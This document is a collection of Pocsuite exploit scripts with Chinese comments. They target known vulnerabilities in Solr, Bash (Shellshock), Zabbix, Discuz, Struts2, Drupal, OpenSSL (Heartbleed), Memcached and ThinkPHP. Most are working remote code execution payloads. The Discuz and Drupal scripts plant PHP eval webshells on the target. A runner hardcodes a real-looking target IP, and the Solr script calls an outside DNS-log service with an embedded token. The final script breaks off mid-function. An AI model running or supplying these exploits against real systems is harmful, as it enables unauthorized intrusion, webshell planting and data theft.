#!/usr/bin/env python
# coding: utf-8
from pocsuite3.api import requests
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from urllib.parse import urlparse
import base64
import json

def urlparse_to_ip_port(rhost):

    host = urlparse(rhost).netloc
    if ':' in host:
        ip,port = host.split(':')
    else:
        ip = host
        port = 0
    return ip,int(port)

class TestPOC(POCBase):
    vulID = ''
    cveID = ''
    version = 'high'
    author = ['csy']
    vulDate = ''
    createDate = ''
    updateDate = ''
    references = ['']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = '远程执行'
    desc = '''
    
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段
    def _attack(self):
        result = {}
        #Write your code here
        return self.parse_output(result)


    def get_name(self,url):

        url += "/solr/admin/cores?wt=json&indexInfo=false"
        
        conn = requests.get(url)
        name = "test"
        try:
            name = list(json.loads(conn.text)["status"])[0]
            # print(name)
        except:
            pass
        return name


    def update_conf(self,url,name):
        url = url + "/solr/"+name+"/config"
        headers = {
            "Content-Type": "application/json",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
        }
        # proxy = {'http':'http://127.0.0.1:8080'}
        post_data = """
        {
            "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
            }
        }
        """
        conn = requests.post(url,data=post_data,headers=headers)
        # print(conn.text)
        if conn.status_code != 200:
            return 0
        return 1


    def _verify(self):
        result = {}
        ip,port = urlparse_to_ip_port(self.url)
        if not port and "http://" in self.url:
            port = 80
        elif not port and "https://" in self.url:
            port = 443
        #Write your code here
        
        core_name = self.get_name(self.url)
        self.update_conf(self.url,core_name)
        
        payload = "/solr/"+core_name+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
        headers = {
            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
            'Content-Type':'application/x-www-form-urlencoded'
        }
        url = self.url+payload
        # print(url)
        resp = requests.post(url=url,verify=False,timeout=10)
        str1 = "uid"
        str2 = 'gid'
        # print(resp.text)
        if str1 in resp.content.decode('utf-8') and str2 in resp.content.decode('utf-8'):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = resp.url
            result['VerifyInfo']['PAYLOAD'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(TestPOC)


import random
import re
import string
from os.path import normpath
# from urlparse import urljoin,urlparse,urlunparse
# from pocsuite.api.utils import logger
# from pocsuite.api.poc import POCBase, Output, register
# from pocsuite.api.request import req #用法和 requests 完全相同
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register, logger
from urllib.parse import urlparse, urljoin, urlunparse


class DemoPOC(POCBase):
    vulID = 'CVE-2014-6271'  # https://www.seebug.org/vuldb/ssvid-88877
    version = '1'
    author = ['sxd']
    vulDate = '2014-09-24'
    createDate = '2020-03-3'
    updateDate = '2020-03-3'
    references = ['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/']
    name = 'Bash 4.3 远程命令执行漏洞 POC'
    appPowerLink = 'http://www.gnu.org/software/bash/'
    appName = 'Bash'
    appVersion = '3.0-4.3#'
    vulType = 'Command Execution'
    desc = '''
        		   该漏洞会影响目前主流的Linux和Mac OSX操作系统平台，包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平台。
        		   该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本，会影响到与Bash交互的多种应用，
        		   包括HTTP、OpenSSH、DHCP等。根据目前的漏洞验证情况以及已经流传的POC情况，这个漏洞将严重影响网络基础设施的安全，包括但不限于网络设备、网络安全设备、云和大数据中心等。
        		   Bash 在解析环境变量时，会解析函数，同时可以运行函数后的语句，造成命令执行。'''
    samples = []
    install_requires = ['random', 're', 'string']

    def _verify(self):
        result = {}

        try:
            vul_url = get_url_need(self.url)
            if not vul_url.endswith('.cgi') and not vul_url.endswith('.sh'):
                pass
            else:
                random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))
                headers_fake = {}
                headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str

                response = req.get(vul_url, headers=headers_fake)
                response = response.text

                if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_url
        except Exception as e:
            logger.exception(e)
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()

    def _shell(self):
        pass


def get_url(url):
    try:
        return req.get(url).url
    except:
        return url


def fix_url(url):
    if not url.startswith('http'):
        url = 'http://%s' % url
    return url


def get_url_need(url):
    url_need = None

    url = fix_url(url)

    if url.endswith('.cgi') or url.endswith('.sh'):
        url_need = url
        return url_need

    url = get_url(url)
    url_need = get_link(url)

    if not url_need:
        # print '[*] get url need error'
        url_need = url

    info = url_need
    # print info
    return info


def get_link(url):
    rnt = ''
    try:
        page_content = req.get(url).text
        match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
        for item_url in match:
            if not item_url.startswith('http'):
                item_url = getAbsoluteURL(url, item_url)
            if not is_url_exist(item_url):
                continue
            if isSameDomain(item_url, url):
                rnt = item_url
                break
        return rnt
    except:
        # raise e
        return rnt


def getAbsoluteURL(base, url):
    url1 = urljoin(base, url)
    arr = urlparse(url1)
    path = normpath(arr[2])
    return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment))


def is_url_exist(url):
    try:
        resp = req.get(url)
        if resp.status_code == 404:
            return True
    except Exception as e:
        pass
    return False


def isSameDomain(url1, url2):
    try:
        if urlparse(url1).netloc.split(':')[0] == urlparse(url2).netloc.split(':')[0]:
            return True
        else:
            return False
    except:
        return False


register(DemoPOC)



from cvpoc.thirdparty.colorama.initialise import init as coloramainit
import os
import sys
try:
    import cvpoc
except ImportError:
    sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from cvpoc.cv import verify_poc

SITE_ROOT = os.path.dirname(os.path.abspath(__file__))


def banner():
    msg = """
  /$$$$$$$ /$$    /$$ /$$$$$$   /$$$$$$   /$$$$$$$
 /$$_____/|  $$  /$$//$$__  $$ /$$__  $$ /$$_____/
| $$       \  $$/$$/| $$  \ $$| $$  \ $$| $$      
| $$        \  $$$/ | $$  | $$| $$  | $$| $$      
|  $$$$$$$   \  $/  | $$$$$$$/|  $$$$$$/|  $$$$$$$
 \_______/    \_/   | $$____/  \______/  \_______/
                    | $$                          
                    | $$                          
                    |__/                          
        """
    print(msg)


def run_cvpoc():
    banner()
    # 兼容pocsuite3(python3) ,兼容大部分pocsuite(python2)
    poc_file = os.path.join(SITE_ROOT, 'pocsuite_pocs', 'thinkphp_rce2.py')

    # 支持cvpoc(精简化pocsuite3)
    poc_file = os.path.join(SITE_ROOT, 'cv_pocs', 'thinkphp_rce2.py')

    # 支持easy_poc
    # poc_file = os.path.join(SITE_ROOT, 'easy_pocs', 'thinkphp2.py')
    config = {
        'url': ["http://117.48.133.72:8085/"],
        'poc': poc_file,
        'http_headers': {'Host': 'baidu.com'}
    }
    print(poc_file)
    verify_poc(config)


if __name__ == '__main__':
    run_cvpoc()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '00004'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-26'
    createDate = '2017-08-26'
    updateDate = '2017-08-26'
    references = ['http://www.freebuf.com/vuls/112197.html']
    name = 'Zabbix SQl 注入漏洞 PoC'
    appPowerLink = 'https://www.zabbix.com'
    appName = 'Zabbix'
    appVersion = '3.0.3'
    vulType = 'SQL Injection'
    desc = '''
    	Zabbix 2.2.x和3.0.x版本中存在两处基于错误回显的SQL注入漏洞
    '''
    samples = ['http://89.239.138.140:5001/']

    def _verify(self):
        result = {}
        payload = payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        att_url = self.url + payload
        response = req.get(att_url)
        if "You have an error in your SQL syntax" in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output


register(TestPOC)



#!/usr/bin/env python
#coding:utf-8
# @Date    : 2016-06-24 19:17:19
# @Author  : DshtAnger(dshtanger@gmail.com)
import string,base64,random,hashlib,base64
import urlparse

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = '91879' #ssvid-91879
    version = '1'
    author = 'DshtAnger'
    vulDate = '2016-06-17'
    createDate = '2016-06-24'
    updateDate = '2016-06-24'
    references = ['https://www.seebug.org/vuldb/ssvid-91879']
    name = 'Discuz!Conditional Remote Command Execution Using SSRF!'
    appPowerLink = 'http://www.discuz.net'
    appName = 'Discuz!'
    appVersion = 'x'
    vulType = 'Code Execution'
    desc =  '''
            Discuz ssrf+redis/memcache Code Execution getshell
            '''
    samples = []
    install_requires = []

    def _attack(self):
        result = {}
        url_part = self.url.rpartition('/')

        payload = ('gopher://127.0.0.1:6379/xeval '
                '"local t=redis.call(\'keys\',\'*_setting\');'
                'for i,v in ipairs(t) do redis.call(\'set\',v,'
                '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
                'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
                's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
                's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}'
                's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
                'return 1;" 0 %250D%250Aquit')
        
        target_url = self.url + payload
        vul_rep = req.get(target_url)
        
        while vul_rep.status_code == 200:
            shell_url = url_part[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            shell_rep = req.get(shell_url)

            if shell_rep.status_code == 200:                
                random_sed = string.letters+string.digits
                flag = ''.join([random.choice(random_sed) for _ in range(8)])
                shell_flag = ''.join([random.choice(random_sed) for _ in range(8)])
                
                #use system() write a shell php file and shell will retained after flushing redis apache
                shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
                shell_payload_b64 = base64.b64encode(shell_payload)
                #write a random php file
                req.get(shell_url + '&dshtanger=' + shell_payload_b64)
                #access this php file
                verify_url = url_part[0] + '/' + shell_flag + '.php'
                verify_rep = req.get(verify_url)

                if (verify_rep.status_code == 200) and ( flag in verify_rep.content):
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = verify_url
                    result['ShellInfo']['Content'] = '@eval($_POST[dshtanger]);'

                    #recover website
                    flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
                    flush_url = self.url + flush_payload
                    req.get(flush_url)

                    test_url = url_part[0] + '/forum.php'
                    req.get(test_url)

                    break                    
        return self.parse_output(result)


    def _verify(self):
        result = {}
        url_part = self.url.rpartition('/')
        #ssrf_url = "ssrf_gopher.php?ssrf="
        random_sed = string.letters+string.digits
        flag = ''.join([random.choice(random_sed) for _ in xrange(16)])
        payload = ('gopher://127.0.0.1:6379/xeval '
                '"local t=redis.call(\'keys\',\'*_setting\');'
                'for i,v in ipairs(t) do redis.call(\'set\',v,'
                '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
                'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
                's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
                's:22:\\"md5('+ flag +');\\";}}}'
                's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
                'return 1;" 0 %250D%250Aquit')
        
        target_url = self.url + payload
        target_rep = req.get(target_url)

        while target_rep.status_code == 200 :
            poc_url = url_part[0] +'/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            poc_rep = req.get(poc_url)
            flag_hash = hashlib.md5(flag).hexdigest()
            
            if flag_hash in poc_rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = poc_url

                #recover website
                flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
                flush_url = self.url + flush_payload
                req.get(flush_url)

                test_url = url_part[0] + '/forum.php'
                req.get(test_url)

                break
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
import subprocess
import signal
import os
import sys
import base64
import re
from string import ascii_letters

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


'''
CVE-2019-17558
'''
class Solr_RCE_17558(POCBase):
    vulID = 'solr-CVE-2019-17558'
    appName = 'Solr'
    appVersion = '5.0.0 <= Apache Solr <= 8.3.1'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-10-30'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-10-31'  # 编写 PoC 的日期
    updateDate = '2020-05-21'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt']  # 漏洞地址来源,0day不用写
    name = 'Solr模板注入远程代码执行漏洞'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)


    def _verify(self):
        result={}

        vul_url = self.url
        
        url_cores = vul_url + "/solr/admin/cores?wt=json"

        payload1_j = {
            "update-queryresponsewriter": {
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "params.resource.loader.enabled": "true"
            }
        }
        payload2 = "wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping%20{0}.{1}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end".format(self.BANNER, self.DOMAIN)

        core_names = self.get_core_names(url_cores)

        print(core_names)

        # 对每个core都发送一次请求
        for core_name in core_names:

            select_url = "/solr/" + core_name + "/select"
            
            config_url = "/solr/" + core_name + "/config"
    
            url1 = vul_url + config_url
            url2 = vul_url + select_url + "?" + payload2
            
            target_url = url1

            r1 = None
            r2 = None

            try:
                # 第一步，配置
                r1 = req.post(url1, json=payload1_j)
                if r1.status_code == 200:
                    # 第二步，利用
                    r2 = req.get(url2)
                # 返回400，可能这个core没有带VelocityResponseWriter，尝试下一个core
                elif r1.status_code == 400:
                    continue
            # 碰到异常进行下一个core的尝试
            except Exception as e:
                print(e)
                continue

            #time.sleep(2) # 休眠2s等待ceye生成记录
            #if self.test_dnslog(self.CEYE_URL):
            if self.test_verify(r2):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['core'] = core_name
                result['VerifyInfo']['Payload1'] = payload1_j
                result['VerifyInfo']['Payload2'] = payload2
                return self.save_output(result)
        
        return self.save_output(result)


    ''' 拿到core的名字'''
    def get_core_name(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False)
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                self.save_output(result)
            else:
                a = list(r.json()['status'].keys())
        return a[0]


    ''' 拿到所有core的名字'''
    def get_core_names(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False)
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                self.save_output(result)
            else:
                a = list(r.json()['status'].keys())
        return a


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            sub_domain = d['data'][0]['domain']
            if self.BANNER in sub_domain:
                return True
        except Exception:
            return False                 


    # 以响应中的`org.apache.velocity`作为命令成功执行的特征
    def test_verify(self, p_resp):
        if p_resp.status_code == 500 and "org.apache.velocity" in p_resp.text:
            return True
        return False


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register_poc(Solr_RCE_17558)



#!/usr/bin/python
# -*- coding: utf-8 -*-


from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class Struts45POC(POCBase):
    name = 'struts045'
    vulID = '0'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['bey0nd']
    vulType = 'Command Execution'
    version = '1.0'    # default version: 1.0
    references = ['']
    desc = '''struts2-045'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'struts'
    appVersion = 'struts'
    appPowerLink = 'struts'
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}"
        resp = req.post(self.url,headers = self.headers)
        if resp and resp.text and resp.status_code == 200:
            if "bey0nd" in resp.text:
                result['FileInfo'] = {}
                result['FileInfo']['Filename'] = "bey0nd"
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Failed')
        return output

register(Struts45POC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import random
import string
from collections import OrderedDict

from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

proxies = {"http":"http://127.0.0.1:8080"}

class TestPOC(POCBase):
	vulID = '97207'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
	version = '1' #默认为1
	author = 'Gaia' #  PoC作者的大名
	vulDate = '2018-03-29' #漏洞公开的时间,不知道就写今天
	createDate = '2018-04-14'# 编写 PoC 的日期
	updateDate = '2018-04-14'# PoC 更新的时间,默认和编写时间一样
	references = ['https://research.checkpoint.com/uncovering-drupalgeddon-2/']# 漏洞地址来源,0day不用写
	name = 'Drupal Drupalgeddon 2 远程代码执行漏洞'# PoC 名称
	appPowerLink = 'https://www.drupal.org/'# 漏洞厂商主页地址
	appName = 'Drupal'# 漏洞应用名称
	appVersion = '<7.58, 8.x<8.3.9, 8.4.x<8.4.6, 8.5.x<8.5.1'# 漏洞影响版本
	vulType = 'Remote Code Execution'#漏洞类型,类型参考见 漏洞类型规范表
	desc = '''
	Drupal 是一款用量庞大的CMS，其6/7/8版本的Form API中存在一处远程代码执行漏洞
	 ''' # 漏洞简要描述
	samples = []# 测试样列,就是用 PoC 测试成功的网站
	install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

	def _attack(self):
		result = {}
		vul_url = '%s/user/register?element_parents=account/mail/%%23value&ajax_form=1&_wrapper_format=drupal_ajax' % self.url
		cmd = "echo ':=nfn ct_j($]NMQRYa[)9' | tr '.-x' '0-z'|tee 1.php"
		payload = {"form_id":"user_register_form"
		,"_drupal_ajax":"1"
		,"mail[#post_render][]":"exec"
		,"mail[#type]":"markup"
		,"mail[#markup]":cmd}

		# if not self._verify(verify=False):
		# 	return self.parse_attack(result)

		# print urllib.urlencode(payload)
		response = req.post(vul_url, data=payload,proxies=proxies)
		# response = req.post(vul_url, data=payload)
		# print response.content
		if response.status_code == 200:
			res = req.post(url = self.url+"/1.php",data={"c":"system(\"id\");"},proxies=proxies)
			if "uid" in res.content:
				# print res.content	
				result['ShellInfo'] = {}
				result['ShellInfo']['URL'] = self.url + "/1.php"
				result['ShellInfo']['content'] = '<?php eval($_POST[c]);'

		return self.parse_attack(result)

	def _verify(self, verify=True):
		result = {}
		vul_url = '%s/user/register?element_parents=account/mail/%%23value&ajax_form=1&_wrapper_format=drupal_ajax' % self.url
		cmd = "id"
		payload = {"form_id":"user_register_form"
		,"_drupal_ajax":"1"
		,"mail[#post_render][]":"exec"
		,"mail[#type]":"markup"
		,"mail[#markup]":cmd}


		response = req.post(vul_url, data=payload,proxies=proxies).content
		# response = req.post(vul_url, data=payload).content
		if 'uid' in response:
			result['VerifyInfo'] = {}
			result['VerifyInfo']['URL'] = self.url
			result['VerifyInfo']['Payload'] = urllib.urlencode(payload)
		else:
			return self.parse_attack(result)

		return self.parse_attack(result)

	def parse_attack(self, result):
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail('Internet nothing returned')
		return output

register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

import urllib
import random
import string
import struct
import socket
import time
import select
from collections import OrderedDict
from pocsuite.api.request import req  #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

def request2bin(x):
    return bytes.fromhex(x.replace(' ', '').replace('\n', ''))

client_key_exchange = request2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

malformed_heartbeat = request2bin('''
18 03 02 00 03
01 40 00
''')


def get_msg_from_socket(some_socket, msg_length, time_out=5):
    end_time = time.time() + time_out
    received_data = ''
    remaining_msg = msg_length
    while remaining_msg > 0:
        read_time = end_time - time.time()
        if read_time < 0:
            return None
        read_socket, write_socket, error_socket = select.select([some_socket], [], [], time_out)
        if some_socket in read_socket:
            data = some_socket.recv(remaining_msg)
            if not data:
                return None
            else:
                received_data += data
                remaining_msg -= len(data)
        else:
            pass
    return received_data

def recv_msg(a_socket):
    header = get_msg_from_socket(a_socket, 5)
    if header is None:
        return None, None, None
    message_type, message_version, message_length = struct.unpack('>BHH', header)
    message_payload = get_msg_from_socket(a_socket, message_length, 10)
    if message_payload is None:
        return None, None, None
    return message_type, message_version, message_payload
def send_n_catch_heartbeat(our_socket):
    our_socket.send(malformed_heartbeat)
    while True:
        content_type, content_version, content_payload = recv_msg(our_socket)
        if content_type is None:
            return False
        if content_type == 24:
            return True
        if content_type == 21:
            return False
def main(rhost):
    local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ip, port = rhost[8:].split(':')
    local_socket.connect((ip, int(port)))
    local_socket.send(client_key_exchange)
    while True:
        type, version, payload = recv_msg(local_socket)
        if not type:
            return
        if type == 22 and ord(payload[0]) == 0x0E:
            break
    local_socket.send(malformed_heartbeat)
    return send_n_catch_heartbeat(local_socket)

class TestPOC(POCBase):
    vulID = '1219'
    version = '1'
    author = 'zhangl'
    vulDate = '2014-04-08'
    createDate = '2014-04-08'
    updateDate = '2014-04-08'
    references = ['http://drops.wooyun.org/papers/1381']
    name = 'Openssl 1.0.1 内存读取 信息泄露漏洞'
    appPowerLink = 'https://www.openssl.org/'
    appName = 'OpenSSL'
    appVersion = '1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1'
    vulType = 'Information Disclosure'
    desc = '''
                    OpenSSL是一个强大的安全套接字层密码库。
                    这次漏洞被称为OpenSSL“心脏出血”漏洞，这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。它使攻击者能够从内存中读取最多64 KB的数据。
                    安全人员表示：无需任何特权信息或身份验证，我们就可以从我们自己的（测试机上）偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        # print self.url
        response = main(self.url)
        return self.parse_attack(response)
    def _attack(self):
        return self._verify()
    def parse_attack(self, response):
        output = Output(self)
        result = {}
        if response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = '%s' % self.url
            output.success(result)
        else:
            output.fail('Fail test')
        return output

register(TestPOC)


#!/usr/bin/env python
#_*_ encoding：utf-8 _*_

import socket
from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output

class Memcache(POCBase):
    vulID = '89692'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2015-10-29'
    createDate = '2019-10-12'
    updateDate = '2019-10-12'
    references = ['https://www.seebug.org/vuldb/ssvid-89692']
    name = 'Memcached unauthorized access'
    appPowerLink = 'http://memcached.org/'
    appName = 'memcached'
    appVersion = 'all'
    vulType = 'Unauthorized access'
    desc = '''
    Memcached unauthorized access
    '''
    
    def _verify(self):
        result = {}
        try:
            ip = self.url.split('//')[1]
            port = 11211
            socket.setdefaulttimeout(5)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            payload = 'stats\r\n'
            recv = s.recv(1024)
            if 'STAT version' in recv:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['IP'] = ip
                result['VerifyInfo']['Payload'] = payload
            s.close()
        except:
            pass
        return self.parse_output(result)
    
    def _attack(self):
        return self._verify()
    
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Memcache)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import urlparse
from pocsuite.api.request import req
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):
    vulID = 'N/A'  # ssvid
    version = '1.0'
    author = ['co0ontty']
    vulDate = '2019-08-12'
    createDate = '2019-08-12'
    updateDate = '2019-08-12'
    references = ['https://blog.thinkphp.cn/869075']
    name = 'Thinkphp 5.0.22/5.1.29 远程命令执行漏洞'
    appPowerLink = 'http://www.thinkphp.cn'
    appName = 'Thinkphp'
    appVersion = '5.0.22/5.1.29'
    vulType = '命令执行'
    desc = ''' 
    由于框架对控制器名没有进行足够的检测，会导致在没有开启强制路由的情况下引发 getshell 漏洞。该漏洞影响 5.0.22/5.1.29 版本。
    '''
    samples = ['']
    install_requires = ['']

    def _verify(self):
        def vul_check(payload):
            url = urlparse.urljoin(base_url, payload)
            create_verify_file = req.get(url)
            get_verify_str = req.get(verify_url)
            return get_verify_str

        result = {}
        base_url = self.url
        if (urlparse.urlparse(base_url).port) is None:
            base_url = base_url+":80"
        verify_str = randomStr(6)
        verify_filename = randomStr(3)
        verify_url = urlparse.urljoin(base_url, verify_filename+".php")
        payload_list = [
            "index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=<?php echo '{}';?>".format(
                verify_filename, verify_str),
            "index.php?s=index/\\think\\template\driver\\file/write?cacheFile={}.php&content=<?php echo '{}';?>".format(
                verify_filename, verify_str)
        ]
        if any(verify_str in vul_check(x) for x in payload_list):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
